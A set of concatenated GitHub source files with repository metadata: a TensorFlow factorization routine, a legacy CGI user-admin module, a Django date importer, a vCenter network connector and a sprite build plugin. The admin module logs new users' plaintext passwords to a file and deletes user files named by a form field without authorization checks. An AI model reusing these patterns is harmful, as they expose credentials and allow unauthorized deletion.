# unclipped_term is based only on the minimum unclipped error for each
# clone. The intuition is that we know for every clone at least one sample
# must be a non-hit (e.g. a beads only sample), and so should be well modeled
# by the background process.
unclipped_term = tf.reduce_min(tf.pow(differences, 2), axis=1)
loss = (
tf.reduce_mean(tf.pow(tf.minimum(differences, clip_threshold), 2))
+ tf.reduce_mean(unclipped_term) / s
)
update_clip_value = clip_threshold.assign(percentile(differences, clip_percentile))
# Training
train_step = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(loss)
init = tf.global_variables_initializer()
best_cost_value = None
last_log_at = 0
with tf.Session() as session:
session.run(init)
all_indices = np.arange(observed.shape[0], dtype=int)
for i in range(max_epochs):
indices = np.array(list(range(observed.shape[0])))
np.random.shuffle(indices)
for minibatch_indices_value in np.array_split(
indices, int(len(indices) / minibatch_size)
):
minibatch_indices_value = minibatch_indices_value[:minibatch_size]
if len(minibatch_indices_value) == minibatch_size:
feed_dict = {
target: observed.values[minibatch_indices_value],
minibatch_indices: minibatch_indices_value,
}
session.run(train_step, feed_dict=feed_dict)
feed_dict = {target: observed, minibatch_indices: all_indices}
(clip_threshold_value, cost_value) = session.run(
[update_clip_value, loss], feed_dict=feed_dict
)
# Update best epoch
if best_cost_value is None or cost_value < best_cost_value:
best_cost_value = cost_value
best_epoch = i
(best_a, best_b) = session.run([a, b], feed_dict=feed_dict)
# Log
if log_every_seconds and time.time() - last_log_at > log_every_seconds:
print(
"[Epoch %5d] %f, truncating at %f%s"
% (
i,
cost_value,
clip_threshold_value,
" [new best]" if i == best_epoch else "",
)
)
# Stop criterion
if i - best_epoch > patience:
print("Early stopping at epoch %d." % i)
break
background_names = ["_background_%d" % i for i in range(rank)]
best_a = pd.DataFrame(best_a, index=observed.index, columns=background_names)
best_b = pd.DataFrame(best_b, index=background_names, columns=observed.columns)
results = observed - np.matmul(best_a, best_b)
for name in background_names:
results[name] = best_a[name]
results.loc[name] = best_b.loc[name]
return results
|
{
"content_hash": "c2b0edf0a8130ff59f082a1600eb7aff",
"timestamp": "",
"source": "github",
"line_count": 184,
"max_line_length": 87,
"avg_line_length": 37.53804347826087,
"alnum_prop": 0.6332705950485015,
"repo_name": "laserson/phip-stat",
"id": "bd64d9f67c8663e55032af40d06240e06cdf6b11",
"size": "6907",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "phip/clipped_factorization.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "920975"
},
{
"name": "Python",
"bytes": "76170"
}
],
"symlink_target": ""
}
|
import sys
import os
from modules.logintools.xmlsqlite import SQL
from modules.configobj import ConfigObj
from modules.pathutils import *
from modules.cgiutils import *
from loginutils import *
###################################################
def cSort(inlist, minisort=True):
"""A case insensitive sort. If minisort is True then elements of the list for which element1.lower() == element2.lower() will also be sorted.
(See the examples/test stuff."""
sortlist = []
newlist = []
sortdict = {}
for entry in inlist:
try:
lentry = entry.lower()
except AttributeError:
sortlist.append(lentry)
else:
try:
sortdict[lentry].append(entry)
except KeyError:
sortdict[lentry] = [entry]
sortlist.append(lentry)
sortlist.sort()
for entry in sortlist:
try:
thislist = sortdict[entry]
if minisort: thislist.sort()
newlist = newlist + thislist
except KeyError:
newlist.append(entry)
return newlist
####################################################
# Various default values etc
adminpage_file = 'admin_page.html'
adminmenu_file = 'admin_menu.txt'
adminconfig_file = 'admin_config.txt' # the template used for the 'edit config' option.
admininvite_file = 'admin_invite.txt' # the template to invite/create new users
adminuser_file = 'admin_eduser.txt' # template for edit/delete user
MAXADMINLEV = 3 # the maximum admin level it's possible for a user to have
MINMAXAGE = 600 # the minimum value for cookie max-age
pass_msg = '\nYour login name is "%s", your password is "%s".\nYou can change this once you have logged in.\n'
SCRIPTLOC = 'http://' + os.environ.get('HTTP_HOST', '') # XXXX do we trust this in all cases ? (i.e. not always http - https)
numonpage = 5 # number of users shown on a page at a time
# table elements used to display the accounts in edit users
edit_table_s = '<table width="90%" cellspacing="15" bgcolor="#3377bb" class="table">'
table_e = '</table>'
elem_h = '<tr><td align="center"><table border="4" width="100%" bgcolor="#dddddd">'
elem_f = '</table></td></tr>'
form_s = '''<form method="post" action="%s"><input type="hidden" name="login" value="admin">
<input type="hidden" name="action" value="%s"><input type="hidden" name="admin" value="%s">
<input type="hidden" name="start" value="%s"><input type="hidden" name="username" value="%s">
'''
form_e = '</form>'
account_table = form_s + '''<tr>
<td align="center"><strong>Login Name : </strong></td><td align="center"><input type="text" name="loginname" value="%s"></td>
<td align="center"><strong>Real Name : </strong></td><td align="center"><input type="text" name="realname" value="%s"></td></tr><tr>
<td align="center"><strong>Email : </strong></td><td align="center"><input type="text" name="email" value="%s"></td>
<td align="center"><strong>Admin Level</strong></td><td align="center"><input type="text" name="adminlev" value="%s"></td></tr><tr>
<td align="center"><strong>New Password : </strong></td><td align="center"><input type="text" name="pass1"></td>
<td align="center"><strong>Cookie max-age : </strong></td><td align="center"><input type="text" name="maxage" value="%s"></td></tr><tr>
<td align="center"><strong>Confirm Password : </strong></td><td align="center"><input type="text" name="pass2"></td>
<td align="center"><strong>Editable : </strong></td><td align="center"><input type="checkbox" name="editable" %s ></td></tr><tr><td align="center">
<input type="reset"></td><td> </td><td> </td><td align="center"><input type="submit" value="Submit Changes"></td></tr><tr>''' + form_e + form_s + '''
<td> </td><td> </td><td> </td><td> </td></tr><tr>
<td> </td><td align="center"><input type="checkbox" name="confirm">Confirm Delete</td><td align="center"><input type="submit" value="Delete User">
</td><td> </td></tr>''' + form_e
####################################################
# main menu - offering
# edit config
# edit users (including delete)
# invite/create new users
# display edit config (including values from the default user)
# edit config
# display invite/create
# invite new users
# create new user file
# edit user - can't edit or delete yourself or the 'main admin' (saves having to change newcookie)
# choose a user to edit or delete
# display edit user for that account
# or delete user (confirm ?)
# edit user -
# change password
# rename (change login name - ?)
# change display name
# change email address
def admin(theform, userdir, thisscript, userconfig, action, newcookie):
"""Decide what admin action to perform. """
adminaction = theform.getfirst('admin', '')
if adminaction.startswith('editconfig'):
editconfig(theform, userdir, thisscript, userconfig, action, newcookie)
elif adminaction.startswith('invite'):
invite(theform, userdir, thisscript, userconfig, action, newcookie)
elif adminaction.startswith('edituser'):
edituser(theform, userdir, thisscript, userconfig, action, newcookie)
elif adminaction.startswith('doeditconfig'):
doeditconfig(theform, userdir, thisscript, userconfig, action, newcookie)
elif adminaction.startswith('doinvite'):
doinvite(theform, userdir, thisscript, userconfig, action, newcookie)
elif adminaction.startswith('edituser'):
edituser(theform, userdir, thisscript, userconfig, action, newcookie)
elif adminaction.startswith('doedituser'):
doedituser(theform, userdir, thisscript, userconfig, action, newcookie)
elif adminaction.startswith('deluser'):
deluser(theform, userdir, thisscript, userconfig, action, newcookie)
else:
displaymenu(theform, userdir, thisscript, userconfig, action, newcookie)
def displaymenu(theform, userdir, thisscript, userconfig, action, newcookie):
"""Display the admin menu page."""
config = ConfigObj(userdir + 'config.ini')
templatedir = config['templatedir']
adminpage = readfile(templatedir+adminpage_file)
adminpage = adminpage.replace('**this script**', thisscript + '?action=' + action)
url = '?login=admin&admin=%s&action=' + action
adminmenu = readfile(templatedir+adminmenu_file)
adminmenu = adminmenu.replace('**edit config**', thisscript+url % 'editconfig')
adminmenu = adminmenu.replace('**edit users**', thisscript+url % 'edituser')
adminmenu = adminmenu.replace('**invite**', thisscript+url % 'invite')
adminpage = adminpage.replace('**admin**', adminmenu)
adminpage = adminpage.replace('**admin menu**', thisscript+'?login=admin'+'&action='+action)
print(newcookie)
print(serverline)
print("")
print(adminpage)
sys.exit()
def editconfig(theform, userdir, thisscript, userconfig, action, newcookie, msg=None, success=None):
"""Display the screen to edit the main config file.
This includes the default user."""
config = ConfigObj(userdir + 'config.ini')
default = ConfigObj(userdir + 'default.ini')
templatedir = config['templatedir']
adminpage = readfile(templatedir+adminpage_file)
adminpage = adminpage.replace('**this script**', thisscript + '?action=' + action)
adminpage = adminpage.replace('**admin menu**', thisscript+'?login=admin'+'&action='+action)
# The values of this that are editable from config.ini are :
# newloginlink, adminmail, email_subject, email_message
#
# The values of this that are editable from default.ini are :
# max-age, editable
if msg:
adminpage = adminpage.replace('<br><!- message --> ', '<h2>'+msg+'</h2>')
if msg and not success:
loginlink = theform.getfirst('loginlink', '')
if loginlink:
loginlink = 'checked'
adminmail = theform.getfirst('adminmail', '')
emailsubj = theform.getfirst('emailsubject', '')
emailmsg = theform.getfirst('emailmsg', '')
maxage = theform.getfirst('maxage', '')
editable = theform.getfirst('editable', '')
if editable:
editable = 'checked'
else:
loginlink = config['newloginlink'].lower()
if loginlink == 'yes':
loginlink = 'checked'
else:
loginlink = ''
adminmail = config['adminmail']
emailsubj = config['email_subject']
emailmsg = config['email_message']
maxage = default['max-age']
editable = default['editable'].lower()
if editable == 'yes':
editable = 'checked'
else:
editable = ''
configmenu = readfile(templatedir+adminconfig_file)
configmenu = configmenu.replace('**loginlink**', loginlink)
configmenu = configmenu.replace('**adminmail**', adminmail)
configmenu = configmenu.replace('**email subject**', emailsubj)
configmenu = configmenu.replace('**email message**',emailmsg)
configmenu = configmenu.replace('**maxage**', maxage)
configmenu = configmenu.replace('**editable**', editable)
configmenu = configmenu.replace('**thisscript**', thisscript)
configmenu = configmenu.replace('**action**', action)
adminpage = adminpage.replace('**admin**', configmenu)
print newcookie
print serverline
print
print adminpage
sys.exit()
def invite(theform, userdir, thisscript, userconfig, action, newcookie, msg=None, success=None):
"""Display the screen to create or invite a new user."""
config = ConfigObj(userdir + 'config.ini')
templatedir = config['templatedir']
adminpage = readfile(templatedir+adminpage_file)
adminpage = adminpage.replace('**this script**', thisscript + '?action=' + action)
adminpage = adminpage.replace('**admin menu**', thisscript+'?login=admin'+'&action='+action)
# Values to be filled in are :
# **create1** and **create2** - the one switched on should be 'checked', the other should be ''
if msg:
adminpage = adminpage.replace('<br><!- message --> ', '<h2>'+msg+'</h2>')
if msg and not success:
create = theform.getfirst('create', '')
if create == 'create':
create1 = 'checked'
create2 = ''
else:
create2 = 'checked'
create1 = ''
realname = theform.getfirst('realname', '')
username = theform.getfirst('username', '')
email = theform.getfirst('email', '')
pass1 = theform.getfirst('pass1', '')
pass2 = theform.getfirst('pass2', '')
adminlev = theform.getfirst('adminlev', '')
else:
create2 = 'checked'
create1 = ''
realname = ''
username = ''
email = ''
pass1 = randomstring(8)
pass2 = pass1
adminlev = '0'
invitemenu = readfile(templatedir+admininvite_file)
invitemenu = invitemenu.replace('**create1**', create1)
invitemenu = invitemenu.replace('**create2**', create2)
invitemenu = invitemenu.replace('**realname**', realname)
invitemenu = invitemenu.replace('**username**', username)
invitemenu = invitemenu.replace('**email**', email)
invitemenu = invitemenu.replace('**pass1**', pass1)
invitemenu = invitemenu.replace('**pass2**', pass2)
invitemenu = invitemenu.replace('**adminlev**', adminlev)
invitemenu = invitemenu.replace('**thisscript**', thisscript)
invitemenu = invitemenu.replace('**action**', action)
adminpage = adminpage.replace('**admin**', invitemenu)
print(newcookie)
print(serverline)
print("")
print(adminpage)
sys.exit()
def edituser(theform, userdir, thisscript, userconfig, action, newcookie, msg=None, success=None):
"""Display the screen to edit or delete users.."""
config = ConfigObj(userdir + 'config.ini')
templatedir = config['templatedir']
realadminlev = int(userconfig['admin'])
adminpage = readfile(templatedir+adminpage_file)
adminpage = adminpage.replace('**this script**', thisscript + '?action=' + action)
adminpage = adminpage.replace('**admin menu**', thisscript+'?login=admin'+'&action='+action)
userlist = [entry[:-4] for entry in os.listdir(userdir) if os.path.isfile(userdir+entry) and entry[:-4] not in RESERVEDNAMES ]
mainadmin = config['adminuser']
username = userconfig['username']
if mainadmin in userlist:
userlist.remove(mainadmin)
if username in userlist:
userlist.remove(username)
userlist = cSort(userlist)
start = int(theform.getfirst('start', '1'))
length = len(userlist)
if start*numonpage > length:
start = length//numonpage + 1
url = '<a href="' + thisscript + '?start=%s&login=admin&admin=edituser&action=' + action + '">%s</a>'
indexline = '<div style="text-align:center;">%s</div>' % makeindexline(url, start, length, numonpage)
# need to be able to edit -
# username, realname, new password, confirm password, adminlev, email, max-age, editable
index = (start-1)*numonpage + 1
last = min(length+1, index+numonpage)
usermenu = indexline + '<br>' + edit_table_s
while index < last: # go through all the users
thisuser = userlist[index-1]
index += 1
thisuserc = ConfigObj(userdir+thisuser+'.ini')
adminlev = thisuserc['admin']
if realadminlev <= int(adminlev):
continue
loginname = thisuser
realname = thisuserc['realname']
email = thisuserc['email']
maxage = thisuserc['max-age']
editable = ''
if istrue(thisuserc['editable']):
editable = 'checked'
if theform.getfirst('username')==loginname and msg and not success:
realname = theform.getfirst('realname', '')
realname = theform.getfirst('realname', '')
email = theform.getfirst('email', '')
adminlev = theform.getfirst('adminlev', '')
maxage = theform.getfirst('maxage', '')
editable = theform.getfirst('editable', '')
if editable:
editable = 'checked'
thevals = (thisscript, action, 'doedituser', start, loginname,
loginname, realname, email, adminlev, maxage, editable,
thisscript, action, 'deluser', start, loginname)
usermenu += elem_h + (account_table % thevals) + elem_f
# kim's stuff!!!!!
project=action.split("_")[-1]
sql=SQL(project)
uid=sql.userid(thisuser, realname)
#print "Content-Type: text/html\n" # blank line: end of headers
#print "kim<br>", project,thisuser,uid
# kim's stuff ends....
usermenu += table_e + '<br>' + indexline
eduserpage = readfile(templatedir+adminuser_file)
eduserpage = eduserpage.replace('**account table**', usermenu)
if msg:
adminpage = adminpage.replace('<br><!- message --> ', '<h2>%s</h2>' % msg)
adminpage = adminpage.replace('**admin**', eduserpage)
print(newcookie)
print(serverline)
print("")
print(adminpage)
sys.exit()
##########################################################
def doeditconfig(theform, userdir, thisscript, userconfig, action, newcookie):
"""Receives the submission from the edit config page."""
config = ConfigObj(userdir + 'config.ini')
default = ConfigObj(userdir + 'default.ini')
loginlink = theform.getfirst('loginlink', '')
adminmail = theform.getfirst('adminmail', '')
emailsubj = theform.getfirst('emailsubject', '')
emailmsg = theform.getfirst('emailmsg', '')
maxage = theform.getfirst('maxage', '')
editable = theform.getfirst('editable', '')
if adminmail and not validemail(adminmail):
editconfig(theform, userdir, thisscript, userconfig, action, newcookie, "The adminmail doesn't appear to be a valid address.")
if not maxage.isdigit():
editconfig(theform, userdir, thisscript, userconfig, action, newcookie, "maxage must be a number.")
if int(maxage) and int(maxage) < MINMAXAGE:
editconfig(theform, userdir, thisscript, userconfig, action, newcookie, "maxage must be greater than %s." % MINMAXAGE)
if loginlink:
config['newloginlink'] = 'Yes'
else:
config['newloginlink'] = 'No'
config['adminmail'] = adminmail
config['email_subject'] = emailsubj
config['email_message'] = emailmsg
config.write()
default['max-age'] = maxage
if editable:
default['editable'] = 'Yes'
else:
default['editable'] = 'No'
default.write()
displaymenu(theform, userdir, thisscript, userconfig, action, newcookie) # XXXX should we send a msg here 'COnfig File Edited' ?
#####################################################################
def doinvite(theform, userdir, thisscript, userconfig, action, newcookie):
"""Receives the submission from the invite/create new user page."""
config = ConfigObj(userdir + 'config.ini')
default = ConfigObj(userdir + 'default.ini')
create = theform.getfirst('create', '')
realname = theform.getfirst('realname', '')
username = theform.getfirst('username', '')
email = validemail(theform.getfirst('email', ''))
pass1 = theform.getfirst('pass1', '')
pass2 = theform.getfirst('pass2', '')
adminlev = theform.getfirst('adminlev', '')
maxadminlev = min(int(userconfig['admin']), MAXADMINLEV)
if not email:
invite(theform, userdir, thisscript, userconfig, action, newcookie, 'The email address appears to be invalid.')
if pass1 != pass2:
invite(theform, userdir, thisscript, userconfig, action, newcookie, "The two passwords don't match.")
if len(pass1) < 5:
invite(theform, userdir, thisscript, userconfig, action, newcookie, "The password must be at least five characters long.")
if not realname:
invite(theform, userdir, thisscript, userconfig, action, newcookie, 'You must supply a realname.')
if not username:
invite(theform, userdir, thisscript, userconfig, action, newcookie, 'You must supply a username.')
if not adminlev.isdigit():
invite(theform, userdir, thisscript, userconfig, action, newcookie, 'Admin level must be a number.')
if int(adminlev) > maxadminlev:
invite(theform, userdir, thisscript, userconfig, action, newcookie, 'Admin level is greater than the maximum allowed (%s).' % maxadminlev)
# now we need to check if the username already exists
tempstore = ConfigObj(userdir + 'temp.ini')
pendinglist = tempstore.get('pending', [])
if os.path.isfile(userdir+username+'.ini') or username in pendinglist or username.lower() in RESERVEDNAMES:
invite(theform, userdir, thisscript, userconfig, action, newcookie, 'username already exists.')
for char in username.lower():
if not char in validchars:
invite(theform, userdir, thisscript, userconfig, action, newcookie, 'username contains invalid characters.')
# now we have verified the values - we *either* need to create a new username *or* send an invitiation
if create == 'create':
createuser(userdir, realname, username, email, pass1, adminlev)
msg = 'New User Created'
else:
inviteuser(userdir, realname, username, email, pass1, thisscript, adminlev)
msg = 'New User Invited'
invite(theform, userdir, thisscript, userconfig, action, newcookie, msg, True)
####################################################################
def doedituser(theform, userdir, thisscript, userconfig, action, newcookie):
"""Receives form submissions from the 'edit user' page."""
# parameters to get :
# username, realname, email, adminlev, pass1, pass2
username = theform.getfirst('username') # the user we are editing
loginname = theform.getfirst('loginname') # the new user name (won't usually change I guess)
realname = theform.getfirst('realname')
email = theform.getfirst('email')
adminlev = theform.getfirst('adminlev')
pass1 = theform.getfirst('pass1')
pass2 = theform.getfirst('pass2')
maxage = theform.getfirst('maxage')
editable = theform.getfirst('editable')
maxadminlev = min(int(userconfig['admin']), MAXADMINLEV)
# check all the account values
# this could be turned into a generic 'account checker' function if we wanted.
email = validemail(email)
if not email:
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'The Email Address Appears to Be Invalid.')
if not loginname:
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'You Must Supply a Login Name.')
for char in loginname.lower():
if not char in validchars:
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'Login Name Contains Invalid Characters')
if not realname:
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'You Must Supply a Real Name')
if (pass1 or pass2) and not (pass1 and pass2):
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'To Change the Password - Enter it Twice')
if pass1 != pass2:
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'The Two Passwords Are Different')
if pass1 and len(pass1) < 5:
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'Password Must Be at Least Five Characters')
if not adminlev.isdigit():
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'The Admin Level Must Be a Number')
if int(adminlev) > maxadminlev:
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'Admin Level is Higher than the Max (%s).' % maxadminlev)
if not maxage.isdigit():
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'Cookie "max-age" Must Be a Number')
if int(maxage) and int(maxage) < MINMAXAGE:
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'Cookie "max-age" Must Be Greater Than %s' % MINMAXAGE)
if editable:
editable = 'Yes'
else:
editable = 'No'
# let's just check if the username has changed
thisuser = ConfigObj(userdir+username+'.ini')
if loginname != username:
pendinglist = ConfigObj(userdir + 'temp.ini').get('pending', [])
if os.path.isfile(userdir+loginname+'.ini') or loginname in pendinglist or loginname.lower() in RESERVEDNAMES:
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'Login Name Chosen Already Exists')
thisuser.filename = userdir+loginname+'.ini' # change to new name
os.remove(userdir+username+'.ini') # free up the old name
if pass1:
from dataenc import pass_enc
thisuser['password'] = pass_enc(pass1, daynumber=True, timestamp=True)
#
thisuser['realname'] = realname
thisuser['email'] = email
thisuser['admin'] = adminlev
thisuser['max-age'] = maxage
thisuser['editable'] = editable
thisuser.write()
# edituser(theform, userdir, thisscript, userconfig, action, newcookie, '')
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'Changes Made Successfully', True)
def deluser(theform, userdir, thisscript, userconfig, action, newcookie):
"""Receives form submissions from when 'delete user' is hit."""
# parameters to get :
# username, realname, email, adminlev, pass1, pass2
username = theform.getfirst('username')
confirm = theform.getfirst('confirm')
if not confirm:
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'Confirm Was Not Selected - Delete Not Done', True)
# XXXX we ought to check that the user being deleted isn't the main admin user and hasn't got a higher admin level
os.remove(userdir+username+'.ini') # is it really that easy
edituser(theform, userdir, thisscript, userconfig, action, newcookie, 'Delete Done Successfully', True)
###############################################
# createuser is in loginutils - but this uses a couple of values defined in this module
def inviteuser(userdir, realname, username, email, password, thisscript, adminlev):
"""Invite a new user."""
from newlogin import savedetails
from configobj import ConfigObj
formdict = {'username' : username, 'pass1' : password, 'admin' : adminlev,
'realname' : realname, 'email' : email, 'action' : '' }
thekey = savedetails(userdir, formdict)
config = ConfigObj(userdir + 'config.ini')
msg = config['email_message'] + '\n'
msg = msg + SCRIPTLOC + thisscript + '?login=confirm&id=' + thekey + (pass_msg % (username, password))
writefile('log.txt', msg)
sendmailme(email, msg, config['email_subject'], email, html=False)
"""
CHANGELOG
=========
2005/10/30
----------
Fixed the email function... oops.
2005/09/16
----------
Removed dependency on caseless module (added ``cSort``).
2005/09/09
----------
Changes to work with pythonutils 0.2.1
"""
|
{
"content_hash": "cc9eb28e5f7d9358ce842c8f7d2b5561",
"timestamp": "",
"source": "github",
"line_count": 569,
"max_line_length": 159,
"avg_line_length": 44.63093145869947,
"alnum_prop": 0.6381571175428233,
"repo_name": "amir-zeldes/rstWeb",
"id": "5f39e8af3750e14c9b669cb31a7b93173719677e",
"size": "26008",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "modules/logintools/admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "21"
},
{
"name": "CSS",
"bytes": "13764"
},
{
"name": "Dockerfile",
"bytes": "248"
},
{
"name": "HTML",
"bytes": "22693"
},
{
"name": "JavaScript",
"bytes": "90168"
},
{
"name": "Less",
"bytes": "54854"
},
{
"name": "Python",
"bytes": "614970"
},
{
"name": "SCSS",
"bytes": "55558"
},
{
"name": "Shell",
"bytes": "220"
}
],
"symlink_target": ""
}
|
from os import path
import unicodecsv as csv
from promrep.models import DateInformation, DateType, Person, SecondarySource
def read_input_file(ifname): # noqa
file_basename = path.basename(ifname)
file_basename = path.splitext(file_basename)[0]
log_fname = file_basename + "_import-log.csv"
# sec_source, created = SecondarySource.objects.get_or_create(
# name="Nicolet Equites Data", biblio="Nicolet Biblio Entry",
# abbrev_name="Nicolet")
# log file with the ids of the objects created in the database
csv_log = csv.DictWriter(
open(log_fname, "wb"),
["person_id", "person", "status_assertion", "post_assertion"],
dialect="excel",
delimiter=";",
extrasaction="ignore",
)
csv_log.writeheader()
with open(ifname, "rU") as csvfile:
csvDict = csv.DictReader(csvfile, delimiter=";")
for row_dict in csvDict:
person_id = row_dict["Person ID"]
# will fail if we don't find the person, mostly for debug purposes
try:
person = Person.objects.get(id=person_id)
# can have up to 5 dates
for i in range(1, 6):
date_str = row_dict["Date{}".format(i)].strip()
date_ref = row_dict["DateRef{}".format(i)].strip()
uncertain_str = row_dict["DateUncertain{}".format(i)].strip()
date_type_str = row_dict["DateType{}".format(i)].strip()
date_note = row_dict["DateNotes{}".format(i)].strip()
sec_source = False
if date_ref:
try:
sec_source = SecondarySource.objects.get(
abbrev_name=date_ref
)
except:
sec_source, created = SecondarySource.objects.get_or_create(
abbrev_name=date_ref, biblio=date_ref, name=date_ref
)
if date_str:
# print i, row_dict
unc_flag = False
if uncertain_str:
unc_flag = True
date_type, created = DateType.objects.get_or_create(
name=date_type_str
)
# date can be in intervals;
# if we have a before or after,
# we'll only create a single point
interval = "S"
if "before" in date_str:
# B: Before
interval = "B"
date_str = date_str.replace("before", "").strip()
date_str = -int(date_str)
elif "after" in date_str:
# A: After
interval = "A"
date_str = date_str.replace("after", "").strip()
date_str = -int(date_str)
elif "by" in date_str:
# B: Before
interval = "B"
date_str = date_str.replace("by", "").strip()
date_str = -int(date_str) - 1
elif "AD" in date_str:
date_str = date_str.replace("AD", "").strip()
date_str = int(date_str)
else:
date_str = -int(date_str)
try:
di = DateInformation.objects.create(
person_id=person.id,
value=date_str,
uncertain=unc_flag,
date_type=date_type,
notes=date_note,
date_interval=interval,
)
if sec_source:
di.secondary_source = sec_source
di.save()
except:
print(
(
"Cannot create DateInformation object".format(
row_dict
)
)
)
print(("Added {} to Person {}".format(di.id, person.id)))
except Exception as e:
print(e)
print(("Cannot find person with id={}".format(person_id)))
print(('Wrote log file "{}"'.format(log_fname)))
def run():
ifname = "promrep/scripts/data/life_data/LifeDatesV4.csv"
print(('Importing data from "{}"'.format(ifname)))
read_input_file(ifname)
|
{
"content_hash": "53f577974b37140ccc195548252e5144",
"timestamp": "",
"source": "github",
"line_count": 129,
"max_line_length": 88,
"avg_line_length": 39.10852713178294,
"alnum_prop": 0.4103072348860258,
"repo_name": "kingsdigitallab/dprr-django",
"id": "54921ca954b7574da2c912e258e1773ee1b073f1",
"size": "5083",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "promrep/scripts/import_life_data.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "788"
},
{
"name": "HTML",
"bytes": "99560"
},
{
"name": "JavaScript",
"bytes": "10628"
},
{
"name": "Jinja",
"bytes": "220"
},
{
"name": "Python",
"bytes": "668975"
},
{
"name": "SCSS",
"bytes": "73040"
},
{
"name": "Shell",
"bytes": "6209"
}
],
"symlink_target": ""
}
|
class VmNetworkMapping(object):
def __init__(self):
self.vnic_name = ''
self.dv_port_name = ''
self.dv_switch_name = ''
self.dv_switch_path = ''
self.vlan_id = ''
self.vlan_spec = ''
class VmNetworkRemoveMapping(object):
def __init__(self):
self.vnic_name = ''
self.network_name = ''
class ConnectRequest(object):
def __init__(self, vnic_name, network):
"""
model for the reconfigure request
:param vnic_name: str
:param network: vim.Network
"""
self.vnic_name = vnic_name
self.network = network
class VirtualSwitchToMachineConnector(object):
def __init__(self,
dv_port_group_creator,
virtual_machine_port_group_configurer):
"""
:param dv_port_group_creator: <DvPortGroupCreator> instance/interface
:param virtual_machine_port_group_configurer: <VirtualMachinePortGroupConfigurer> instance/interface
:type virtual_machine_port_group_configurer: cloudshell.cp.vcenter.vm.portgroup_configurer.VirtualMachinePortGroupConfigurer
:return:
"""
self.dv_port_group_creator = dv_port_group_creator
self.virtual_machine_port_group_configurer = virtual_machine_port_group_configurer
def connect_by_mapping(self, si, vm, mapping, default_network, reserved_networks, logger, promiscuous_mode):
"""
gets the mapping to the vnics and connects it to the vm
:param default_network:
:param si: ServiceInstance
:param vm: vim.VirtualMachine
:param mapping: [VmNetworkMapping]
:param reserved_networks:
:param logger:
:param promiscuous_mode <str> 'True' or 'False' turn on/off promiscuous mode for the port group
"""
request_mapping = []
logger.debug(
'about to map to the vm: {0}, the following networks'.format(vm.name if vm.name else vm.config.uuid))
for network_map in mapping:
network = self.dv_port_group_creator.get_or_create_network(si,
vm,
network_map.dv_port_name,
network_map.dv_switch_name,
network_map.dv_switch_path,
network_map.vlan_id,
network_map.vlan_spec,
logger,
promiscuous_mode)
request_mapping.append(ConnectRequest(network_map.vnic_name, network))
logger.debug(str(request_mapping))
return self.virtual_machine_port_group_configurer.connect_vnic_to_networks(vm,
request_mapping,
default_network,
reserved_networks,
logger)
|
{
"content_hash": "b36c9b188678af2bdfbadd63de8743fe",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 132,
"avg_line_length": 45.18421052631579,
"alnum_prop": 0.47815958066394876,
"repo_name": "QualiSystems/vCenterShell",
"id": "9fcaba8935a28a335af0a9a0f3f1e620650ffc63",
"size": "3435",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "package/cloudshell/cp/vcenter/vm/dvswitch_connector.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "8339"
},
{
"name": "Makefile",
"bytes": "7672"
},
{
"name": "Python",
"bytes": "629506"
},
{
"name": "Shell",
"bytes": "646"
}
],
"symlink_target": ""
}
|
import os
import sys
if __name__ == '__main__':
os.environ.setdefault(
'DJANGO_SETTINGS_MODULE', 'ics_generator.tests.south_settings')
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
{
"content_hash": "3b32a7c7e4876271c39a95e4d819f409",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 71,
"avg_line_length": 25.5,
"alnum_prop": 0.6941176470588235,
"repo_name": "bitmazk/django-ics-generator",
"id": "4b428aa5e8e9ad14d96f135c6d301a5dd5ae751c",
"size": "277",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "manage.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "6741"
}
],
"symlink_target": ""
}
|
import os
import sys
import pipes
import shutil
import subprocess
"""
This plugin uses glue to sprite images:
http://glue.readthedocs.org/en/latest/quickstart.html
Install:
(Only if you want to sprite jpg too)
brew install libjpeg
(Only if you want to optimize pngs with optipng)
brew install optipng
sudo easy_install pip
sudo pip uninstall pil
sudo pip install pil
sudo pip install glue
"""
try:
import glue
except Exception as e:
sys.exit('Could not use glue: %s\nMaybe install: sudo easy_install glue' % e)
IMG_PATH = 'static/img/sprites'
CSS_PATH = 'static/css/sprites'
KEY = '_PREV_CHECKSUM'
def checksum(path):
command = 'md5 `find %s -type f`' % pipes.quote(IMG_PATH)
return subprocess.check_output(command, shell=True)
def preBuild(site):
currChecksum = checksum(IMG_PATH)
prevChecksum = getattr(site, KEY, None)
# Don't run if none of the images has changed
if currChecksum == prevChecksum:
return
if os.path.isdir(CSS_PATH):
shutil.rmtree(CSS_PATH)
os.mkdir(CSS_PATH)
os.system('glue --cachebuster --crop --optipng "%s" "%s" --project' % (IMG_PATH, CSS_PATH))
setattr(site, KEY, currChecksum)
|
{
"content_hash": "393be6421520b4f6e797ec8cac25573e",
"timestamp": "",
"source": "github",
"line_count": 55,
"max_line_length": 95,
